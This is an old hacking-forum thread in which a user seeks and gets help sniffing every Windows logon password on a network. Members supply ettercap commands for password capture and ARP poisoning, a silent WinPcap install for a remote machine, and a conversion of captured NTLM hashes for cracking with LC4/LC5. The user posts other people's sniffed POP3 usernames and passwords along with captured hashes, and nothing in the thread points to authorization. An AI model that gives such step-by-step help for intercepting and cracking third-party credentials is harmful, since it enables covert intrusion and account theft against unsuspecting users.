XeLoRy
Does anyone have a good command-line password sniffer to recommend?
I want to sniff the logon passwords to get all the Windows users' passwords on a network, but I can't find any good command-line sniffer... I spent about 2 hours searching and testing all sorts of sniffers from Google, but without success.


Some help needed, thx (sorry for bad English)
talaxian
ettercap will do that for ya.

http://ettercap.sourceforge.net/
XeLoRy
yeah, thank you very much man, but what can I compile that with?
nuorder
two other command line sniffers - already compiled

tethereal, which is part of the ethereal package
www.ethereal.com

dsniff
www.datanerds.net/~mike/dsniff.html
XeLoRy
thx nuorder, I've downloaded ethereal and installed it, but it's a GUI program,
but I suppose there is a command-line executable included when it is installed,
so I want to know if it is tethereal.exe? When I start it there is a DOS window
showing this:

Capturing on \Device\NPF_GenericNdisWanAdapter
0.000000 50:bd:20:52:41:53 -> Locate-Directory-Server LLC U, func=UI; DSAP LLC
Sub-Layer Management Group, SSAP LLC Sub-Layer Management Command

and then it holds on... what do I have to do with my LAN to sniff? just start this executable and wait? where are the found passwords stored?

a little help plz
strasharo
Xelory, look here https://sourceforge.net/project/showfiles.php?group_id=17435
This is the sourceforge repository, where you can find compiled ettercap.
Hope that this will help you.
Have a nice day.
nuorder
yeah, probably better off with ettercap, it supports password sniffing. the other sniffers are good but you have to extract the data manually - it's fun! but time consuming lol

edit: just had a better look at ettercap's features, it's got a nice set of password features.. this requires time
XeLoRy
thx all but :

CODE

26/06/2004  22:34       <DIR>          .
26/06/2004  22:34       <DIR>          ..
30/01/2003  22:34              382.976 cygcrypto-0.9.7.dll
10/07/2003  21:11              284.672 cygcrypto.dll
30/01/2003  22:34               79.360 cygssl-0.9.7.dll
10/07/2003  21:11               74.240 cygssl.dll
10/07/2003  21:11              398.664 cygwin1.dll
10/07/2003  21:11              109.568 ettercap.exe
              6 fichier(s)        1.329.480 octets
              2 Rép(s)   8.817.119.232 octets libres

C:\TOOLZ\ettercap>ettercap

C:\TOOLZ\ettercap>


it doesn't do anything, is that normal? and when I list my processes I can't find ettercap running

what's the problem?
FiNaLBeTa
cain and abel, oxit.it
XeLoRy
but cain and abel are GUI sniffers, and I want a command-line sniffer
FiNaLBeTa
QUOTE (XeLoRy @ Jun 26 2004, 08:52 PM)
but cain and abel are GUI sniffers, and I want a command-line sniffer

cain is, abel is the remote version. never tested it myself, but if it works like cain, it's a winner.
XeLoRy
hmm, didn't know that, why not, I will test it and tell you
strasharo
Xelory, I had the same problem with ettercap, and in my case the problem was WinPcap. I had the latest WinPcap installed (>3.0) and ettercap just didn't start, without any error. If you have the latest WinPcap installed, just uninstall it, reboot and then install WinPcap 2.3, which is provided with ettercap. I think that this will fix the issue.
Have a nice day.
XeLoRy
thx strasharo !!! I've just uninstalled WinPcap 3.1 beta and installed 2.3 without a reboot and it works

Now i run a :

CODE
C:\TOOLZ\ettercap>ettercap -NCsz

ettercap 0.6.b (c) 2002 ALoR & NaGA

List of available devices :

 --> [dev1] - [NdisWan Adapter]
 --> [dev2] - [VIA Rhine II Fast Ethernet Adapter]


Please select one of the above, which one ? [0]: 2
Your IP: 10.0.0.1 with MAC: 00:10:DC:97:CC:E4 on Iface: dev2

Loading plugins... Done.
Building host list for netmask 255.255.255.0, please wait...

Resolving 1 hostnames...

* |==================================================>| 100.00 %


Press 'h' for help...

Sniffing (IP based): ANY:0 <--> ANY:0

TCP + UDP packets... (default)

Collecting passwords...


to collect all the passwords of all the IPs on the LAN, but do I have to let it run like that for a while to wait for some passwords?


I've done this to log the sniffed traffic to a file:


CODE
[qQ]  - quit
[lL]  - log all trafic to file(s)
space - stop/cont sniffing


Logging to file(s)...



but when are the Windows logon session passwords sniffed? when anybody logs on to a workstation on the LAN, or something else? I need to know...

edit: well, I logged on to a workstation on my LAN while ettercap was sniffing in password mode and I got a result in the log file like this:

CODE
decoder    Decodedata_MakeConnectionList - new node ! 40 ! T 10.0.0.2:1046 - 10.0.0.1:139
illithid    Dissector_StateMachine_SetStatus - (3)! T 10.0.0.1:139 - 10.0.0.2:1043 -- [A250EB921240BB85]
illithid    Dissector_StateMachine_SetStatus - (2)! T 10.0.0.2:1043 - 10.0.0.1:139 -- [(null)]
decoder    Decodedata_MakeConnectionList - new node ! 41 ! T 10.0.0.1:4343 - **.**.90.88:26999
illithid    Dissector_StateMachine_SetStatus - (3)! T 10.0.0.1:139 - 10.0.0.2:1043 -- [AB1C24A794FFCCCC]
decoder    Decodedata_MakeConnectionList - new node ! 42 ! T 10.0.0.2:1048 - 10.0.0.1:445
illithid    Dissector_StateMachine_SetStatus - (2)! T 10.0.0.2:1043 - 10.0.0.1:139 -- [(null)]


where 10.0.0.1 is the ettercap PC, and 10.0.0.2 is the PC that just logged on...

WHERE IS THE PASS?


and second BIG question, how can I install WinPcap discreetly (not by a remote viewer, too lame) on a remote box?
THX FOR HELP
nuorder
works fine with winpcap version 3.0 (not 3.1) for me
run "ettercap -NCLzs" to sniff for passwords that are going to/from your machine from anyone. the L is for a logfile, which is stored in the ettercap directory

read the pdf that came with ettercap for instructions on how to arp poison if you need to do that
eg: "ettercap -NCza -D 100 192.168.0.1 192.168.0.2 55:23:A5:B4:C7:89 00:A3:56:FE:4F:6D"

when testing, make sure that the host that is trying to connect to you doesn't already have the login password cached, otherwise it may not send it, so you won't see anything.


as for installing winpcap silently there is one you can download off their site
winpcap.polito.it/install/default.htm
QUOTE
Transparent installation

This file installs WinPcap silently, without making the installation screen appearing and without any user intervention
XeLoRy
QUOTE
when testing, make sure that the host that is trying to connect to you doesn't already have the login password cached, otherwise it may not send it, so you won't see anything.


what do you mean by "cached login"?


-----------------------------------------------------------------------------------------------

well, I've installed everything it needed on the remote box but I still have an important question


CODE
ettercap 0.6.b © 2002 ALoR & NaGA

List of available devices :

 --> [dev0] - [NDIS 5.0 driver]
 --> [dev2] - [NdisWan Adapter]
 --> [dev3] - [NdisWan Adapter]
 --> [dev4] - [NdisWan Adapter]
 --> [dev5] - [NdisWan Adapter]
 --> [dev6] - [NdisWan Adapter]
 --> [dev7] - [NdisWan Adapter]


Please select one of the above, which one ? [0]:


how can I know which adapter is the ethernet one that is enabled in the network connections control panel?

I've been in there and seen a Realtek adapter... but which one of these is the right one?
nuorder
QUOTE
what do you mean by "cached login" ???
if you are accessing resources remotely and tick the "save password" box then next time it may not pick up on the credentials as windows already knows about the login

QUOTE
how can I know which adapter is the ethernet one that is enabled in the network connections control panel?
try them all, start at 0 as that's the most probable
XeLoRy
yes, thx, 0 is the right one

I've run an ettercap -NCLsz

and now I'm waiting for a logon password in the log file

I hope it will work...



edit : huhuhu

CODE
11:10:42  10.0.1.8:3046 <--> ***.15.97.147:110           pop3

USER: *speiriii@*********.net

PASS: lzz



11:12:33  10.0.1.103:1740 <--> ***.15.97.147:110           pop3

USER: *speir@*********.net

PASS: walton


edit2: how can I activate the ACTIVE PROTOCOL DISSECTION in an ARP-based sniff, to spy on the SSL traffic? I read about it in the doc but they don't show how to activate it...

edit3: SHIT! I've had this msg in the log file for a few minutes:

CODE
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [60]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [4]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494]
ettercap   Buffer_Put -- 0 BUFFER FULL !! buff len [100000] byte lost [1494]


and it continues like that for about 100 lines. what must I do? restart the sniffing?

edit4: well, I've restarted that shit and now I've got a new sniffed password, but I can't understand where the user login is and where the pass is:

CODE
11:27:41  10.0.1.105:1701 <--> 10.0.1.3:139    netbios-ssn

USER: \FALCON\IPC$
PASS:

LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000


need help
Metathron
QUOTE

11:27:41  10.0.1.105:1701 <--> 10.0.1.3:139    netbios-ssn

USER: \FALCON\IPC$
PASS:

LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000



well, so far as I know it's the hash... now you have to crack it with LC4 / 5 or anything else

and then you will have the password
XeLoRy
CODE
LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000


yes, I understood that, but I don't know this hash format; it appears that it's the LC 2.5 format... possible? but we are at versions 4 and 5...

my question is: what's the LC4 format of this hash? and then I will crack it as usual O:-)
strasharo
There is a file called lc-converter.c in the dir share, which comes with ettercap. It's a converter that converts these hashes into LC 4.0 format.

QUOTE

/*
    ettercap -- L0pht crack converter form ettercap log to LC 4.0

That's it.
Have a nice day.
Metathron
Wow nice thanks

hmm, my system is fresh and I must first find the Visual Basic CD

can you please upload the compiled version, if possible?

Meta

edit1:\\
already compiled now

but as a trial member I'm not able to upload files

sorry

edit2:\\

I've tested the compiler

my input file was
-----------------------------
USER: \FALCON\IPC$
PASS:

LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000
-----------------------------

output file was then :
-----------------------------
\FALCON\IPC$:"":"":0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000:479EE3535736FACB
-----------------------------

well, but what must I choose in LC5... Import from PWDump file?
when I choose PWDump file... it brutes for only some seconds, not the right bruteforcing
and when I choose Unix shadow file it wants to brute for 650 days


so please, what should I do
strasharo
Here is the compiled converter.
XeLoRy
well, I've put this line in a txt file called 1.txt:

CODE
"USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000


then I tried to convert it with the lc-converter using this command:

CODE
c:\toolz\lcconverter\lc-converter 1.txt 2.txt



but I've got nothing in my 2.txt... why?
Metathron
read my post and you will find the answer

you need the full log

USER: \FALCON\IPC$
PASS:

LC 2.5 FORMAT: "USER":3:479EE3535736FACB:0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000




well, but what must I choose in LC5... Import from PWDump file?
when I choose PWDump file... it brutes for only some seconds, not the right bruteforcing
and when I choose Unix shadow file it wants to brute for 650 days


so please, what should I do



XeLoRy
hmm, I've done what you said but in my 2.txt I've got this line:

CODE
\FALCON\IPC$:"":"":0000574A504C454D4F4E530057696E646F777320342E3000:57696E646F777320342E300004FF00000002000100130000:479EE3535736FACB



and when I import the file in LC4 with the import pwdump file option, the username to crack is \FALCON\IPC$ ... that's not the login to crack, is it?

can anyone explain this to me?
g33k
hi all,
how about using DaSniff?
It works well with WinPCAP as well as the Win2K native
interface. You can use expressions in rules to capture
the traffic.

Try Google to get it.

Also try Natas, the sniffer for Win2k.

regards,
g33k